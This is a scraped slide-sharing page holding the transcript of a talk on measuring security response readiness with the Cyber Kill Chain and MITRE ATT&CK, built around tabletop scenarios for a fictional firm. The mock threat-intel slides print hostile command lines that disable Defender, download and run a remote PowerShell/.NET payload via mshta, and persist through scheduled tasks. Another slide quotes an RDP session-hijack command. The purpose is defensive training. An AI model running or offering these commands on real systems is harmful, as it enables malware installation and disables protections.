Understanding NFT Marketplace Ecosystem.pptx
NFT Space.
 
Indian Privacy law & Infosec for Startups
Indian Privacy law & Infosec for StartupsIndian Privacy law & Infosec for Startups
Indian Privacy law & Infosec for Startups
AMol NAik
 
The learners analyze the various sectors of ICT and evaluate the potential ca...
The learners analyze the various sectors of ICT and evaluate the potential ca...The learners analyze the various sectors of ICT and evaluate the potential ca...
The learners analyze the various sectors of ICT and evaluate the potential ca...
maricrismontales
 
FIDO Munich Seminar: Securing Smart Car.pptx
FIDO Munich Seminar: Securing Smart Car.pptxFIDO Munich Seminar: Securing Smart Car.pptx
FIDO Munich Seminar: Securing Smart Car.pptx
FIDO Alliance
 
BCC -401-aktu-Cyber-Security Unit-1.docx
BCC -401-aktu-Cyber-Security Unit-1.docxBCC -401-aktu-Cyber-Security Unit-1.docx
BCC -401-aktu-Cyber-Security Unit-1.docx
pubgnewstate1620
 
FIDO Munich Seminar In-Vehicle Payment Trends.pptx
FIDO Munich Seminar In-Vehicle Payment Trends.pptxFIDO Munich Seminar In-Vehicle Payment Trends.pptx
FIDO Munich Seminar In-Vehicle Payment Trends.pptx
FIDO Alliance
 
FIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptx
FIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptxFIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptx
FIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptx
FIDO Alliance
 
Leading Bigcommerce Development Services for Online Retailers
Leading Bigcommerce Development Services for Online RetailersLeading Bigcommerce Development Services for Online Retailers
Leading Bigcommerce Development Services for Online Retailers
SynapseIndia
 
Blue Screen Of Death | Windows Down | Biggest IT failure
Blue Screen Of Death | Windows Down | Biggest IT failureBlue Screen Of Death | Windows Down | Biggest IT failure
Blue Screen Of Death | Windows Down | Biggest IT failure
Dexbytes Infotech Pvt Ltd
 

Recently uploaded (20)

Bài tập tiếng anh lớp 9 - Ôn tập tuyển sinh
Bài tập tiếng anh lớp 9 - Ôn tập tuyển sinhBài tập tiếng anh lớp 9 - Ôn tập tuyển sinh
Bài tập tiếng anh lớp 9 - Ôn tập tuyển sinh
 
SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)
SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)
SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)
 
Epicor Kinetic REST API Services Overview.pptx
Epicor Kinetic REST API Services Overview.pptxEpicor Kinetic REST API Services Overview.pptx
Epicor Kinetic REST API Services Overview.pptx
 
Generative AI technology is a fascinating field that focuses on creating comp...
Generative AI technology is a fascinating field that focuses on creating comp...Generative AI technology is a fascinating field that focuses on creating comp...
Generative AI technology is a fascinating field that focuses on creating comp...
 
Mega MUG 2024: Working smarter in Marketo
Mega MUG 2024: Working smarter in MarketoMega MUG 2024: Working smarter in Marketo
Mega MUG 2024: Working smarter in Marketo
 
FIDO Munich Seminar Workforce Authentication Case Study.pptx
FIDO Munich Seminar Workforce Authentication Case Study.pptxFIDO Munich Seminar Workforce Authentication Case Study.pptx
FIDO Munich Seminar Workforce Authentication Case Study.pptx
 
Using ScyllaDB for Real-Time Write-Heavy Workloads
Using ScyllaDB for Real-Time Write-Heavy WorkloadsUsing ScyllaDB for Real-Time Write-Heavy Workloads
Using ScyllaDB for Real-Time Write-Heavy Workloads
 
Top keywords searches on business in AUS
Top keywords searches on business in AUSTop keywords searches on business in AUS
Top keywords searches on business in AUS
 
Flame Atomic Emission Spectroscopy.-pptx
Flame Atomic Emission Spectroscopy.-pptxFlame Atomic Emission Spectroscopy.-pptx
Flame Atomic Emission Spectroscopy.-pptx
 
Network Auto Configuration and Correction using Python.pptx
Network Auto Configuration and Correction using Python.pptxNetwork Auto Configuration and Correction using Python.pptx
Network Auto Configuration and Correction using Python.pptx
 
UiPath Community Day Amsterdam presentations
UiPath Community Day Amsterdam presentationsUiPath Community Day Amsterdam presentations
UiPath Community Day Amsterdam presentations
 
Understanding NFT Marketplace Ecosystem.pptx
Understanding NFT Marketplace Ecosystem.pptxUnderstanding NFT Marketplace Ecosystem.pptx
Understanding NFT Marketplace Ecosystem.pptx
 
Indian Privacy law & Infosec for Startups
Indian Privacy law & Infosec for StartupsIndian Privacy law & Infosec for Startups
Indian Privacy law & Infosec for Startups
 
The learners analyze the various sectors of ICT and evaluate the potential ca...
The learners analyze the various sectors of ICT and evaluate the potential ca...The learners analyze the various sectors of ICT and evaluate the potential ca...
The learners analyze the various sectors of ICT and evaluate the potential ca...
 
FIDO Munich Seminar: Securing Smart Car.pptx
FIDO Munich Seminar: Securing Smart Car.pptxFIDO Munich Seminar: Securing Smart Car.pptx
FIDO Munich Seminar: Securing Smart Car.pptx
 
BCC -401-aktu-Cyber-Security Unit-1.docx
BCC -401-aktu-Cyber-Security Unit-1.docxBCC -401-aktu-Cyber-Security Unit-1.docx
BCC -401-aktu-Cyber-Security Unit-1.docx
 
FIDO Munich Seminar In-Vehicle Payment Trends.pptx
FIDO Munich Seminar In-Vehicle Payment Trends.pptxFIDO Munich Seminar In-Vehicle Payment Trends.pptx
FIDO Munich Seminar In-Vehicle Payment Trends.pptx
 
FIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptx
FIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptxFIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptx
FIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptx
 
Leading Bigcommerce Development Services for Online Retailers
Leading Bigcommerce Development Services for Online RetailersLeading Bigcommerce Development Services for Online Retailers
Leading Bigcommerce Development Services for Online Retailers
 
Blue Screen Of Death | Windows Down | Biggest IT failure
Blue Screen Of Death | Windows Down | Biggest IT failureBlue Screen Of Death | Windows Down | Biggest IT failure
Blue Screen Of Death | Windows Down | Biggest IT failure
 

How to measure your security response readiness?

  • 1. How to measure your security response readiness? Tomasz Jakubowski @perunhimself tomasz@shellsquad.com
  • 2. Lockheed Martin Cyber Kill Chain® - recap Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed- martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
  • 3. 0 10 20 30 40 50 60 Recon Weaponization Delivery Exploitation Installation C&C Actions on objectives Detection vs Closure Detected Closed Close the gap
  • 4. MITRE ATT&CK ™ • Website: https://attack.mitre.org • Quote: “MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.”
  • 5. MITRE ATT&CK ™ Tactics Techniques • Answers WHY an action is performed by an adversary • Provide useful context to individual techniques • Answers HOW an adversary achieves a tactical objective by performing an action (e.g. send spearphising email with an attachment to gain initial foothold) • Useful information for both red and blue teams MITRE ATT&CK ™ Tactics Techniques • Answers WHY an action is performed by an adversary • Provide useful context to individual techniques • Answers HOW an adversary achieves a tactical objective by performing an action (e.g. send spearphising email with an attachment to gain initial foothold) • Useful information for both red and blue teams
  • 6. MITRE ATT&CK ™ Source: https://attack.mitre.org/theme/images/enterprise-pre-lifecycle.png
  • 8. What is described • Tactics (E: 12) • Techniques (E: 266) • Description • Examples: Groups and/or software using this technique • Mitigation • Detection • References • Groups (94) • Description • Aliases • Techniques used • Software used • References • Software (414) • Description • Techniques used • Groups using it • References
  • 9. There are just too many techniques! Shortlist! eg. Industry > Groups > Techniques
  • 10. MITRE ATT&CK™ toolset • MITRE ATT&CK™ Navigator https://mitre-attack.github.io/attack-navigator/enterprise/
  • 11. The “Target” • Fictional company (or maybe not) https://www.sensenet-library.com • Provides services available online • AI constructs – they just live in cyberspace • it’s critical for them to be online! • Construct – a copy of consciousness allowing for immortal life in cyberspace • Keeps confidential data on their internal network • You don’t want people breaking in and making copies of customers’ constructs
  • 13. Warm-up: Detection and Containment Phase Detect Deny Disrupt Degrade Deceive Contain Reconnaissance Firewall Honeypot Weaponization NIPS Delivery Exploitation AV Installation Command & Control AV Actions on Targets LMCyberKillChain® Countermeasures
  • 14. Completed: Detection and Containment Phase Detect Deny Disrupt Degrade Deceive Contain Reconnaissance Web Analytics Web logs Router Logs NIDS Firewall Honeypot Redirect Loop Honeypot Redirect Loops Firewall Weaponization NIDS NIPS NIPS Delivery NIDS HIDS AV Web Filter Mail Filter Inline AV Mail Filter Web Filter Queuing Sinkhole Combination of Deny/Disrupt Honeypot App-Aware Firewall Honeypot Exploitation HIDS NIDS AV Patch AV HIPS Patch AV HIPS Highly restricted User Accounts Honeypot Inter-Zone NIPS Installation HIDS Application Logs AV NetFlow App Whitelisting Blocked Execution AV HIPS Combination of Deny/Disrupt Honeypot Command & Control NIDS HIDS AV Firewall Sinkhole NIPS DEP Sinkhole Tarpit Sinkhole DNS Redirect Sinkhole Actions on Targets Audit Logs DEP AV NIDS HIDS Firewall Network Segmentation DLP Network Segmentation HIPS Network Segmentation Honeypot LMCyberKillChain® Countermeasures
  • 15. Scenario 1: OMG! New vulnerability • CVE-2029-0708 – Online Surrogate Service Remote Code Execution • A remote code execution vulnerability exists in Online Surrogate Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target surrogate that can lead to complete takeover of the surrogate. • To exploit this vulnerability, an attacker would need to send a specially crafted request to the target surrogate Online Surrogate Service via RDP. • The update addresses the vulnerability by correcting how Online Surrogate Services handles connection requests. • You’ve checked – you have an old version of the software and you can’t patch right now due to some other dependencies that need to be sorted out first Publicly Disclosed Proof of Concept Exploited Latest Software Release Older Software Release Denial of Service Yes Yes Yes 4 – Not affected 1 – Exploitation More Likely No
  • 17. T1076: Remote Desktop Protocol • Mitigation • Disable the RDP service if it is unnecessary, • remove unnecessary accounts and groups from Remote Desktop Users groups, • enable firewall rules to block RDP traffic between network security zones, • Audit the Remote Desktop Users group membership regularly, • Remove the local Administrators group from the list of groups allowed to log in through RDP, • Limit remote user permissions if remote access is necessary, • Use remote desktop gateways and multifactor authentication for remote logins, • Do not leave RDP accessible from the internet, • Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active, • Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server, • Detection • Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP, • Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. • set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP session hijacking (e.g.: sc create sesshijack binpath= “cmd.exe /k tscon 4 /dest:console” and then: net start sesshijack) https://attack.mitre.org/techniques/T1076/ Groups using it: 16 Software using it: 8
  • 18. • Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed • 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd • The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions: 1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures 2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE 3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe 4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCUSoftwareMicrosoftOffice[11- 16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV 5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit - command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New- ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close) 6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F Scenario 2: Threat Intel Report
  • 19. • Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed • 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd • The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions: 1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures 2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE 3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe 4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCUSoftwareMicrosoftOffice[11- 16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV 5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit - command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New- ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close) 6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F Scenario 2: Threat Intel Report T1193: Spearphishing Attachment T1089: Disabling Security Tools T1170: MshtaT1481: Web Service T1053: Scheduled Task T1027: Obfuscated Files or Information T1064: Scripting T1086: PowerShell T1112: Modify Registry
  • 21. Maturity 0 = We do nothing 1 = Locally logged Relevant data is captured on the endpoint 2 = Centrally logged Data is gathered centrally 4 = Alerting We have rules to detect anomalies, suspicious events 5 = Playbook exists A process to respond exists (incl. analyse, contain, eradicate, recover) 6 = Response is automated We have automated response for this alert 3 = Correlated / enriched Logs for the event are enriched with data from other sources to increase fidelity
  • 22. 6 = Response is automated 5 = Playbook exists 4 = Alerting 3 = Correlated / enriched 2 = Centrally logged 1 = Locally logged 0 = We do nothing
  • 23. Scenario 3: It’s all about the money • There is an ongoing trade war between 2 biggest economies in the world • Unfortunately this has an impact on the wealthiest people who are Sense//Net Library’s customers • Few of them decided to put their AI constructs to sleep until better times come hence your profits decrease • The management decided it’s time to cut costs and your department needs to participate • You don’t want to cut people – they are a great team – so you focus on vendor contracts that are going to be renewed this year – which security control can you afford to get rid of?
  • 24. Measure effectiveness of the toolset MITRE ATT&CK techniques Current Early warning Inbound Protect Detect Outbound Protect Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 T1193: Spearphishing Attachment T1089: Disabling Security Tools T1112: Modify Registry T1086: PowerShell T1053: Scheduled Task Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity Shortlisted Techniques
  • 25. Measure effectiveness of the toolset MITRE ATT&CK techniques Current Toolset measure Early warning Inbound Protect Detect Outbound Protect Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 Current Proposed T1193: Spearphishing Attachment 0 0 2 1 2 0 2 1 8 7 T1089: Disabling Security Tools 2 0 0 2 2 0 2 1 9 8 T1112: Modify Registry 0 0 2 1 2 0 2 1 8 7 T1086: PowerShell 2 0 0 2 2 0 2 1 9 8 T1053: Scheduled Task 2 0 2 1 0 2 2 1 10 7 44 37 100% 84% Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity
  • 26. Scenario 4: Let’s go shopping • Times are changing and the company profits picked up • You successfully argued to get a bigger budget and now you can spend some money on a new security control • Your team shortlisted a few vendors and you’ve conducted a PoC • The results are that there a few differences in the products • The procurement team negotiated almost similar prices for the products
  • 27. Measure effectiveness of the toolset MITRE ATT&CK techniques Current Future Toolset measure Early warning Inbound Protect Detect Outbound Protect Proposed Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 ToolA ToolB Current ProposedA ProposedB T1193: Spearphishing Attachment 0 2 1 2 2 2 0 7 9 7 T1089: Disabling Security Tools 2 0 2 2 2 0 2 8 8 10 T1112: Modify Registry 0 2 1 2 2 2 0 7 9 7 T1086: PowerShell 2 0 2 2 2 0 0 8 8 8 T1053: Scheduled Task 2 2 1 0 2 2 0 7 9 7 37 43 39 100% 116% 105% 44 43 39 100% 98% 89% Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity [2] Proposal Applicable [0] N/A Previous compared to Proposed A and B
  • 29. Putting it all together Vulnerability reports Threat Intel reports Toolset effectiveness Response maturity ...